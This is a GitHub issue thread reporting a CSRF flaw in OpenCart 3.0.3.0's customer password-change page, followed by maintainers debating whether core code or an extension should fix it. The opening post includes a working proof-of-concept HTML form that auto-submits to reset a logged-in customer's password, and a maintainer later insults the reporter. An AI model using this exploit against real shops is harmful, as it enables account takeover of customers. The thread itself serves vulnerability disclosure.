### ISSUE TITLE
Opencart-v3-0-3-0 user changes password at csrf vulnerability

### ISSUE THREAD

**Issue by byck01** [opencart/opencart#6701]
exp:
```
<html>
  <body>
    <form id="post123" name="post123" action="http://192.168.0.46/opencart/index.php?route=account/password&language=en-gb" method="POST" enctype="multipart/form-data">

      <input type="hidden" name="password" value="CK01ck01" />
      <input type="hidden" name="confirm" value="CK01ck01" />

  <script>
        document.getElementById('post123').submit();
  </script>

    </form>

  </body>

</html>
```

Specific analysis reference:
[https://whitehatck01.blogspot.com/2018/06/opencart-v3-0-3-0-user-changes-password.html](url)

**Comment by straightlight** [comment]
Invalid URL reference provided. However, no worries about the password forms, just use the CSRF Form Protection on the Marketplace to prevent those events from happening: https://www.opencart.com/index.php?route=marketplace/extension/info&extension_id=4773

**Comment by byck01** [comment]
https://whitehatck01.blogspot.com/2018/06/opencart-v3-0-3-0-user-changes-password.html

**Comment by osworx** [comment]
@straightlight It should be not a task for a 3PD extension to prevent such attacks.
It is the obligation of the core!

**Comment by byck01** [comment]
This is a bug in the program itself. The user_token should be added like a background manager to change passwords.

**Comment by straightlight** [comment]
Couldn't agree more on that one. Which is why, the extension is provided for free with the hopefulness to see it integrated (or similar codes) in the core in the future.

**Comment by byck01** [comment]
Many people don't have such security awareness. I hope you can update the features of the plug-in to the core features in the next release! Thank you！

**Comment by danielkerr** [comment]
@byck01

yes this is something i will add protection again at some point but dickhead u dont bother to tell any one that to pull this off u need the customer to be logged into a store they have purchased from as well as clicking a link with the hack on!

alwasy the magical what if scenarios!

**Comment by danielkerr** [comment]
i have removed the links to your site as this has been reported before which im sure you already know and my project is not here to promote your shitty services!
